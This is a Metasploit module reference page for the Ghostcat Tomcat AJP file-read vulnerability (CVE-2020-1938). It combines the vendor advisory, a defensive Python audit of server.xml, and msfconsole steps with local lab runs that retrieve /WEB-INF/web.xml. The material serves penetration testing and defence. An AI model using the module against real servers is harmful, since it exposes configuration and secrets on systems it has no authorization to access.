Ghostcat - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/tomcat_ghostcat Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Ghostcat
Module: auxiliary/admin/http/tomcat_ghostcat
Source code: modules/auxiliary/admin/http/tomcat_ghostcat.rb
Disclosure date: 2020-02-20
Last modification time: 2021-10-03 16:30:12 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 8080
List of CVEs: CVE-2020-1938
This module is also known as Ghostcat.
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required.
This vulnerability report identified a mechanism that allowed:
- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP.
Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible.
It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
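The mitigation the advisory describes (disable the AJP Connector if it is not required; otherwise upgrade and keep the port away from untrusted users) can be verified from a Tomcat installation's own configuration. The Python script below is an added example and is not part of the Metasploit module or of Tomcat. It parses a server.xml, finds every enabled Connector using an AJP protocol, and reports three conditions: a release below the first fixed version named above (9.0.31, 8.5.51 or 7.0.100), a Connector listening on a non-loopback address, and a Connector without a shared secret. The address, secret and secretRequired attributes are real Tomcat AJP Connector attributes; the three server.xml fragments, the finding codes and the version handling (numeric components only, so 9.0.0.M1 compares as 9.0.0, and lines such as 8.0.x that the advisory does not list are flagged as well because they are below 8.5.51) are the example's own constructed assumptions.

```python
"""Audit a Tomcat server.xml for an exposed AJP Connector (CVE-2020-1938, Ghostcat).

Added defender-side example; not part of the Metasploit module or of Tomcat.
"""
import xml.etree.ElementTree as ET

# First fixed release per major line, as given in the advisory text.
FIXED = {9: (9, 0, 31), 8: (8, 5, 51), 7: (7, 0, 100)}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_version(version):
    """'8.5.32' -> (8, 5, 32). A non-numeric component such as 'M1' ends the parse,
    so the milestone '9.0.0.M1' becomes (9, 0, 0)."""
    parts = []
    for piece in version.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def version_affected(version):
    """True when the release is below the first fixed release of its major line.
    Assumption: lines the advisory does not list (e.g. 8.0.x) are flagged too."""
    parsed = parse_version(version)
    if not parsed or parsed[0] not in FIXED:
        return False
    return parsed < FIXED[parsed[0]]


def ajp_connectors(server_xml):
    """Every enabled <Connector> whose protocol is AJP. A stanza wrapped in an XML
    comment (the disabled form) is not an element and is correctly ignored."""
    root = ET.fromstring(server_xml)
    return [c for c in root.iter("Connector")
            if c.get("protocol", "").upper().startswith("AJP")]


def audit(version, server_xml):
    """Return a list of (code, detail) findings; an empty list means nothing to report."""
    findings = []
    affected = version_affected(version)
    if affected:
        fixed = ".".join(map(str, FIXED[parse_version(version)[0]]))
        findings.append(("OUTDATED", f"Tomcat {version} is below the fixed release {fixed}"))
    for conn in ajp_connectors(server_xml):
        port = conn.get("port", "?")
        address = conn.get("address")
        if address is None:
            # On the affected releases an unset address means every configured IP
            # address; from the fixed releases on, the default is the loopback address.
            exposed = affected
        else:
            exposed = address not in LOOPBACK
        if exposed:
            findings.append(("AJP_NON_LOOPBACK",
                             f"AJP port {port} listens on {address or 'all interfaces'}"))
        # 'secret' is the attribute used from the fixed releases on; 'requiredSecret'
        # is the older spelling it replaced.
        if not (conn.get("secret") or conn.get("requiredSecret")):
            findings.append(("AJP_NO_SECRET", f"AJP port {port} has no shared secret"))
    return findings


# Constructed sample: the shape of the AJP stanza in a pre-fix default server.xml.
DEFAULT_8_5_32 = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>"""

# Constructed sample: AJP kept, but bound to loopback and protected by a secret.
HARDENED = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="PLACEHOLDER_CHANGE_ME" redirectPort="8443" />
  </Service>
</Server>"""

# Constructed sample: the AJP stanza commented out, i.e. the Connector disabled.
DISABLED = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
  </Service>
</Server>"""

if __name__ == "__main__":
    for label, version, xml_text in (("8.5.32 default", "8.5.32", DEFAULT_8_5_32),
                                     ("8.5.51 hardened", "8.5.51", HARDENED),
                                     ("9.0.31 disabled", "9.0.31", DISABLED)):
        print(label, audit(version, xml_text))
```

Run against a real installation by reading the version from the RELEASE-NOTES or the server banner and passing the contents of conf/server.xml; an empty result for a current release with the stanza commented out, or loopback-bound with a secret, is the state the advisory asks for.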
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- CRASH_SAFE: Module should not crash the service.
Basic Usage
msf > use auxiliary/admin/http/tomcat_ghostcat
msf auxiliary(tomcat_ghostcat) > show targets
... a list of targets ...
msf auxiliary(tomcat_ghostcat) > set TARGET target-id
msf auxiliary(tomcat_ghostcat) > show options
... show and set options ...
msf auxiliary(tomcat_ghostcat) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module can be used to retrieve arbitrary files from anywhere in the web application, including the WEB-INF and META-INF directories and any other location that can be reached via ServletContext.getResourceAsStream() on Apache Tomcat servers. It also allows the attacker to process any file in the web application as JSP.
Setup
Running within a Docker container:
docker run --name tomcat --rm -p 8080:8080 -p 8009:8009 tomcat:8.5.32
Verification Steps
- Install the application and start it
- Start msfconsole
- Do: use auxiliary/admin/http/tomcat_ghostcat
- Do: set RHOSTS [ip]
- Do: set RPORT [port]
- Do: set FILENAME [filename]
- Do: run
Options
FILENAME
The file you would like to retrieve from the target web application.
AJP_PORT
The port on the target that is running the Apache JServ Protocol (AJP).
Scenarios
Apache Tomcat 8.5.32
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(admin/http/tomcat_ghostcat) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(admin/http/tomcat_ghostcat) > set FILENAME /WEB-INF/web.xml
FILENAME => /WEB-INF/web.xml
msf6 auxiliary(admin/http/tomcat_ghostcat) > run
[*] Running module against 127.0.0.1
Status Code: 200
Accept-Ranges: bytes
ETag: W/"1227-1529524397000"
Last-Modified: Wed, 20 Jun 2018 19:53:17 GMT
Content-Type: application/xml
Content-Length: 1227
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
Welcome to Tomcat
Welcome to Tomcat
[+] 127.0.0.1:8080 - /Users/user/.msf4/loot/20210408102538_default_127.0.0.1_WEBINFweb.xml_436040.txt
[*] Auxiliary module execution completed
Apache Tomcat on Windows 10.0.16299.125
[*] Processing tomcat_ghostcat.rb for ERB directives.
resource (tomcat_ghostcat.rb)> use auxiliary/admin/http/tomcat_ghostcat
resource (tomcat_ghostcat.rb)> set rport 8080
rport => 8080
resource (tomcat_ghostcat.rb)> set rhosts 127.0.0.1
rhosts => 127.0.0.1
resource (tomcat_ghostcat.rb)> set verbose true
verbose => true
resource (tomcat_ghostcat.rb)> set FILENAME /WEB-INF/web.xml
filename => /WEB-INF/web.xml
resource (tomcat_ghostcat.rb)> run
[*] Running module against 127.0.0.1
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright 2017 The MIT Internet Trust Consortium
Portions copyright 2011-2013 The MITRE Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
version = "4.0"
metadata-complete="true">
Welcome to Tomcat
Welcome to Tomcat
[*] Auxiliary module execution completed
Msfconsole Usage
Here is how the admin/http/tomcat_ghostcat auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > show info
Name: Ghostcat
Module: auxiliary/admin/http/tomcat_ghostcat
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-02-20
Provided by:
A Security Researcher of Chaitin Tech
SunCSR Team
Check supported:
Yes
Basic options:
Name      Current Setting   Required  Description
----      ---------------   --------  -----------
AJP_PORT  8009              no        The Apache JServ Protocol (AJP) port
FILENAME  /WEB-INF/web.xml  yes       File name
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT     8080              yes       The Apache Tomcat webserver port (TCP)
SSL       false             yes       SSL
Description:
When using the Apache JServ Protocol (AJP), care must be taken when
trusting incoming connections to Apache Tomcat. Tomcat treats AJP
connections as having higher trust than, for example, a similar HTTP
connection. If such connections are available to an attacker, they
can be exploited in ways that may be surprising. In Apache Tomcat
9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat
shipped with an AJP Connector enabled by default that listened on
all configured IP addresses. It was expected (and recommended in the
security guide) that this Connector would be disabled if not
required. This vulnerability report identified a mechanism that
allowed: - returning arbitrary files from anywhere in the web
application - processing any file in the web application as a JSP.
Further, if the web application allowed file upload and stored those
files within the web application (or the attacker was able to
control the content of the web application by some other means) then
this, along with the ability to process a file as a JSP, made remote
code execution possible. It is important to note that mitigation is
only required if an AJP port is accessible to untrusted users. Users
wishing to take a defence-in-depth approach and block the vector
that permits returning arbitrary files and execution as JSP may
upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A
number of changes were made to the default AJP Connector
configuration in 9.0.31 to harden the default configuration. It is
likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later
will need to make small changes to their configurations.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-1938
Module Options
This is a complete list of options available in the admin/http/tomcat_ghostcat auxiliary module:
msf6 auxiliary(admin/http/tomcat_ghostcat) > show options
Module options (auxiliary/admin/http/tomcat_ghostcat):
Name      Current Setting   Required  Description
----      ---------------   --------  -----------
AJP_PORT  8009              no        The Apache JServ Protocol (AJP) port
FILENAME  /WEB-INF/web.xml  yes       File name
RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT     8080              yes       The Apache Tomcat webserver port (TCP)
SSL       false             yes       SSL
Advanced Options
Here is a complete list of advanced options supported by the admin/http/tomcat_ghostcat auxiliary module:
msf6 auxiliary(admin/http/tomcat_ghostcat) > show advanced
Module advanced options (auxiliary/admin/http/tomcat_ghostcat):
Name            Current Setting  Required  Description
----            ---------------  --------  -----------
CHOST                            no        The local client address
CPORT                            no        The local client port
ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE         false            no        Enable detailed status messages
WORKSPACE                        no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/tomcat_ghostcat module can do:
msf6 auxiliary(admin/http/tomcat_ghostcat) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/tomcat_ghostcat auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/tomcat_ghostcat) > show evasion
Module evasion options:
Name                Current Setting  Required  Description
----                ---------------  --------  -----------
TCP::max_send_size  0                no        Maxiumum tcp segment size. (0 = disable)
TCP::send_delay     0                no        Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Error socket
Here is a relevant code snippet related to the "Error socket" error message:
201: begin
202: connect(true, { 'RHOST' => datastore['RHOST'].to_s, 'RPORT' => datastore['AJP_PORT'].to_i, 'SSL' => datastore['SSL'] })
203: sock.put(data)
204: buf = sock.get(30) || ''
205: rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
206: elog('Error socket', error: e)
207: ensure
208: disconnect
209: end
210: buf
211: end
Successfully read file <FILENAME>
Here is a relevant code snippet related to the "Successfully read file <FILENAME>" error message:
303: end
304:
305: def check
306: read_remote_file
307: if read_success?(@header_data)
308: return Exploit::CheckCode::Appears("Successfully read file #{datastore['FILENAME']}")
309: end
310:
311: Exploit::CheckCode::Safe
312: rescue StandardError => e
313: Exploit::CheckCode::Unknown(e.message)
Unable to read file, target may not be vulnerable.
Here is a relevant code snippet related to the "Unable to read file, target may not be vulnerable." error message:
321: if read_success?(@header_data)
322: file = store_loot(
323: datastore['FILENAME'].to_s, 'text/plain', datastore['RHOST'].to_s,
324: @body_data, 'Ghostcat File Read/Inclusion', 'Read file', datastore['FILENAME']
325: )
326: print_good file
327: else
328: print_error 'Unable to read file, target may not be vulnerable.'
329: end
330: end
331: end
Related Pull Requests
- #15243 Merged Pull Request: Add check method to tomcat ghostcat module
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #15017 Merged Pull Request: Update tomcat ghost module with default ports
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14394 Merged Pull Request: Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/tomcat_administration
- auxiliary/admin/http/tomcat_utf8_traversal
- auxiliary/scanner/http/tomcat_enum
- auxiliary/scanner/http/tomcat_mgr_login
- exploit/multi/http/tomcat_jsp_upload_bypass
- exploit/multi/http/tomcat_mgr_deploy
- exploit/multi/http/tomcat_mgr_upload
- exploit/windows/http/tomcat_cgi_cmdlineargs
- post/multi/gather/tomcat_gather
- auxiliary/dos/http/apache_tomcat_transfer_encoding
- post/windows/gather/enum_tomcat
Authors
- A Security Researcher of Chaitin Tech
- SunCSR Team
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.